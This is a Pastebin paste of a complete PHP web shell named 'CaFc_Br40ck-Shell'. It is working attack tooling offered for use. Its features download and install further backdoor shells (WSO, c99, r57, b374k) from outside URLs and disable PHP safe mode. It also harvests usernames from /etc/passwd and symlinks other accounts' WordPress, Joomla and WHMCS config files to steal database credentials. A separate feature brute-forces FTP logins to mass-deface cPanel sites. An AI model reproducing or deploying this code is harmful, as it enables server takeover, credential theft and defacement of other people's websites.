CaFc_Br40ck

CaFc_Br40ck-Shell

Jul 19th, 2014
281
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php eval("?>".base64_decode("<?php echo '
<!DOCTYPE html>
<HTML><head>
    <title>CaFc_Br40ck</title>
</head>
<body>
<center>
<table bgcolor="#FFFFFF" border="0" style="width: 100%px;"><tbody>
<tr><td><pre>
  /$$$$$$            /$$$$$$$$               /$$$$$$$            /$$   /$$  /$$$$$$            /$$      
 /$$__  $$          | $$_____/              | $$__  $$          | $$  | $$ /$$$_  $$          | $$      
| $$  \__/  /$$$$$$ | $$     /$$$$$$$       | $$  \ $$  /$$$$$$ | $$  | $$| $$$$\ $$  /$$$$$$$| $$   /$$
| $$       |____  $$| $$$$$ /$$_____/       | $$$$$$$  /$$__  $$| $$$$$$$$| $$ $$ $$ /$$_____/| $$  /$$/
| $$        /$$$$$$$| $$__/| $$             | $$__  $$| $$  \__/|_____  $$| $$\ $$$$| $$      | $$$$$$/ 
| $$    $$ /$$__  $$| $$   | $$             | $$  \ $$| $$            | $$| $$ \ $$$| $$      | $$_  $$ 
|  $$$$$$/|  $$$$$$$| $$   |  $$$$$$$       | $$$$$$$/| $$            | $$|  $$$$$$/|  $$$$$$$| $$ \  $$
 \______/  \_______/|__/    \_______//$$$$$$|_______/ |__/            |__/ \______/  \_______/|__/  \__/
                                    |______/                                                            
                                                                                                        
                                                                                                        
</pre>
</td></tr>
</tbody></table> 
<a href="?">Home</a> | <a href="?mass">Mass Backdoor</a> | <a href="?bypass">Can&#39;t Read etc/named.conf Bypasser</a> | <a href="?databes">DB Interface</a> | <a href="?configrabber">Config Grabber</a> | <a href="?cpm">cPanel Mass Deface</a> | <a href="?logout">Logout</a></center>';
@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']);
echo '
<center><form action="" method="post" enctype="multipart/form-data">
Filename: <input type="file" name="file" /><input type="submit" value="Submit" /><br>Uname : <b>';
echo php_uname();
echo '</b>';
$release = @php_uname('r');
$emak = substr($release, 0, 6);
echo ' <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+';
echo $emak;
echo '">Exploit DB</a> | <a href="http://google.com/search?q=Linux+Kernel+';
echo $emak;
echo '+Root+Explooit">Google</a></center>';
$ini = fopen('php.ini', 'w');
$ambil = "
Safe_mode = OFF
Disable_functions = NONE
Safe_mode_gid = OFF 
Open_basedir = OFF ";
fwrite($ini, $ambil);
if (isset($_GET['databes'])) {
    error_reporting(0);
    mkdir('shell', 0777);
    $inject = file_get_contents('http://pastebin.com/raw.php?i=aeFdzq50');
    $in = fopen("shell/debes.php", "w");
    fwrite($in, base64_decode($inject));
    chmod("shell/debes.php", 0644);
    echo 'DB Interface - <a href="shell/debes.php">Click Here</a><br>';;
};
if (isset($_GET['logout'])) {
    error_reporting(0);
    unset($_SESSION[md5($_SERVER['HTTP_HOST']) ]);
    echo 'bye!';
}
if (isset($_GET['mass'])) {
    error_reporting(0);
    mkdir('shell', 0777);
    $inject = file_get_contents('http://pastebin.com/raw.php?i=ECjytdnR');
    $in = fopen("shell/inject.php", "w");
    fwrite($in, base64_decode($inject));
    chmod("shell/inject.php", 0755);
    echo '1nj3c710n - <a href="shell/inject.php">Here</a> Using Pass : 1nj3c710n<br>';
    $wso = file_get_contents('http://pastebin.com/raw.php?i=bxGPGJGN');
    $w = fopen("shell/wso.php", "w");
    fwrite($w, base64_decode($wso));
    chmod("shell/wso.php", 0755);
    echo 'WSO - <a href="shell/wso.php">Here</a><br>';
    $c99 = file_get_contents('http://pastebin.com/raw.php?i=3CnRkKEp');
    $c = fopen("shell/c99.php", "w");
    fwrite($c, base64_decode($c99));
    chmod("shell/c99.php", 0755);
    echo 'c99 - <a href="shell/c99.php">Here</a><br>';
    $r57 = file_get_contents('http://pastebin.com/raw.php?i=jLkGXvXU');
    $r = fopen("shell/r57.php", "w");
    fwrite($r, base64_decode($r57));
    chmod("shell/r57.php", 0755);
    echo 'whmcs - <a href="shell/cafc.php">Here</a><br>';
    $mad = file_get_contents('http://pastebin.com/raw.php?i=63eAHLFK');
    $m = fopen("shell/mad.php", "w");
    fwrite($m, base64_decode($mad));
    chmod("shell/mad.php", 0755);
    echo 'Madleets - <a href="shell/mad.php">Here</a> Using Pass : mad';
    $bet = file_get_contents('http://pastebin.com/raw.php?i=fd8LA0QJ');
    $b = fopen("shell/b374k.php", "w");
    fwrite($b, base64_decode($bet));
    chmod("shell/b374k.php", 0755);
    echo 'B374k - <a href="shell/b374k.php">Here</a> Using Pass : b374k';;
};
if (isset($_GET['configrabber'])) {;
    echo '
		<center><br>
<form method=post><b>Damn Security Configuration Grabber</b><p>
	<input type=submit name="usre" value="Extract Username" /></form>';
}
if (isset($_POST['usre'])) {
?><form method=post>
	<textarea rows=10 cols=50 name=user><?php $users = file("/etc/passwd");
    foreach ($users as $user) {
        $str = explode(":", $user);
        echo $str[0] . "
";
    };
    echo '</textarea><br><br>
	<input type=submit name=su value="Config" /></form>';
}
error_reporting(0);
if (isset($_POST['su'])) {
    mkdir('Dsec', 0777);
    $rr = " Options all 
 DirectoryIndex Sux.html 
 AddType text/plain .php 
 AddHandler server-parsed .php 
  AddType text/plain .html 
 AddHandler txt .html 
 Require None 
 Satisfy Any";
    $g = fopen('Dsec/.htaccess', 'w');
    fwrite($g, $rr);
    $damnsec = symlink("/", "Dsec/root");
    $rt = "<a href=Dsec/root><br>Root Dir</a><br><br>";
    echo "$rt";
    $dir = mkdir('DSEC', 0777);
    $r = " Options all 
 DirectoryIndex Sux.html 
 AddType text/plain .php 
 AddHandler server-parsed .php 
  AddType text/plain .html 
 AddHandler txt .html 
 Require None 
 Satisfy Any";
    $f = fopen('DSEC/.htaccess', 'w');
    fwrite($f, $r);
    $consym = "<a href=DSEC/>Config</a>";
    echo "$consym";
    $usr = explode("
", $_POST['user']);
    $configuration = array("wp-config.php", "wordpress/wp-config.php", "configuration.php", "blog/wp-config.php", "joomla/configuration.php", "vb/includes/config.php", "includes/config.php", "conf_global.php", "inc/config.php", "config.php", "Settings.php", "sites/default/settings.php", "whm/configuration.php", "whmcs/configuration.php", "support/configuration.php", "whmc/WHM/configuration.php", "whm/WHMCS/configuration.php", "whm/whmcs/configuration.php", "support/configuration.php", "clients/configuration.php", "client/configuration.php", "clientes/configuration.php", "cliente/configuration.php", "clientsupport/configuration.php", "billing/configuration.php", "admin/config.php");
    foreach ($usr as $uss) {
        $us = trim($uss);
        foreach ($configuration as $c) {
            $rs = "/home/" . $us . "/public_html/" . $c;
            $r = "DSEC/" . $us . " .. " . $c;
            symlink($rs, $r);
        }
    }
}
echo '</center>';
if (isset($_GET['bypass'])) {
    echo '
	<form method=post>
	Website Name<br><textarea rows=6 cols=45 name=wen></textarea>
	<br><br><input type=submit name=cant value="Fuck It" /></form><p>';
}
error_reporting(0);
$tt = $_POST["wen"];
if (isset($_POST['cant'])) {
    mkdir('HIDDEN', 0777);
    $rr = " Options all 
 DirectoryIndex Sux.html 
 AddType text/plain .php 
 AddHandler server-parsed .php 
  AddType text/plain .html 
 AddHandler txt .html 
 Require None 
 Satisfy Any";
    $f = fopen('HIDDEN/.htaccess', 'w');
    $hidden = symlink("/", "HIDDEN/root");
    fwrite($f, $rr);
    function RemoveLastSlash($host) {
        if (strrpos($host, '/', -1) == strlen($host) - 1) {
            return substr($host, 0, strrpos($host, '/', -1));
        } else {
            return $host;
        }
    }
    echo "<font color=blue>";
    $tt = trim($_POST["wen"]);
    $txt = explode("
", $tt);
    echo "<table align=center width=50%>
<tr><td align=center><font size=3 color=black>Website Name</td><td align=center><font size=3 color=black>Username</font></td><td align=center><font size=3 color=black>Symlink</font></td></tr>";
    foreach ($txt as $text) {
        $text1 = trim($text);
        $te1 = ereg_replace("(https?)://", "", $text1);
        $te2 = ereg_replace("www.", "", $te1);
        $te = RemoveLastSlash($te2);
        $u = posix_getpwuid(@fileowner("/etc/valiases/" . $te));
        echo "<table align=center width=50%><tr><td align=center><font size=3 color=black><a href=http://" . $te . "><font size=3 color=blue>" . $te . "</a></font></td><td align=center><font size=3 color=black>" . $u['name'] . " </font></td><td align=center><a href=HIDDEN/root/home/" . $u['name'] . "/public_html/><font size=3 color=black>Symlink</a></tr></table>";
        flush();
    }
}
if (isset($_GET['cpm'])) {
    echo '
<html>
<head>
<title> Cpanel Mass Deface </title>
</head>
<style>
body{background-color:#111;color:#00ff00;}
body,td,th{ font: 8pt Lucida,Tahoma;margin:0;vertical-align:top;color:#00ff00; }
table.info{ color:#000;background-color:#222; }
span,h1,a{ color: $color !important; }
span{ font-weight: bolder; }
h1{ border-left:7px solid $color;padding: 3px 5px;font: 14pt Verdana;background-color:#333;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#222; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #555;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
#new,input,table,td,tr,#gg{border-style:solid;text-decoration:bold;}
input,textarea,select{ margin:0;color:#999;background-color:#222;border:1px solid $color; font: 8pt Tahoma,"Tahoma"; }
form{ margin:0px; }
.banner {
    font-size: 30px;
    color: #FFFFFF;
    background-color: #000000;
    font-family: Georgia, "Times New Roman", Times, serif;
}
</style>
<body align="center">
<h1>Damn Security Priv8 Shell | cPanel Mass Deface</h1>
<p>&nbsp;</p>
<form method="post">
<center>
IP Server :<input type="text" name="ip" value="127.0.0.1" />
<p>&nbsp;</p>
User&#39;s List:<br>
<textarea rows="10" style="width:40%;" name="users" value="The Users List"></textarea>
<p>&nbsp;</p>
Password&#39;s List: <br>
<textarea rows="10" style="width:40%;" name="passwords" value="The Password List"></textarea>
<p>&nbsp;</p>
Index File Name: <input type="text" name="index_name" value="index.php" /><br>
<p>&nbsp;</p>
Index File Link: <input type="text" name="index_link" value="index.txt" /><br>
<p>&nbsp;</p>
<input type="submit" name="forest" value="MASS" /><br><br>
</form>';
    set_time_limit(0);
    if (isset($_POST['forest'])) {
        # Get Data From POST
        $ip = trim($_POST['ip']);
        $users = explode("
", $_POST["users"]);
        $passwords = explode("
", $_POST["passwords"]);
        $index_name = trim($_POST['index_name']);
        $index_link = trim($_POST['index_link']);
        #Go Now
        foreach ($users as $user) {
            foreach ($passwords as $pass) {
                $connect_ip = ftp_connect($ip) or die("Couldn't Connect To $ip");
                if (@ftp_login($connect_ip, trim($user), trim($pass))) {
                    echo "<br>Connected To --> $ip@$user
";
                    @ftp_delete($connect_ip, $index_name);
                    $deface = ftp_put($connect_ip, "/public_html/" . $index_name, $index_link, FTP_ASCII);
                    if ($deface) {
                        echo "<br><font color=green> $user --> DefaceD With Success !!</font>";
                        break;
                    } else {
                        echo "<br><font color=red> $user --> Error In Defacing iT !!</font>";
                    }
                } else {
                    echo "<br><font color=red>Couldn't Connect To --> $ip@$user --> $pass</font>
";
                }
            }
        }
        echo "<p>&nbsp;</p>";
        echo "<br><font size=5> ! Mass Defacing Was Done ! </font>";
        echo "<p>&nbsp;</p>";
    }
    echo '
<center>
<span>Thanks to Index Php</span>
</center>
</body>
</html>';
};
echo '
<br>
<span><b>Shell Coded by CaFc_Br40ck</b></span>
</body>
</HTML>';

")); ?>
RAW Paste Data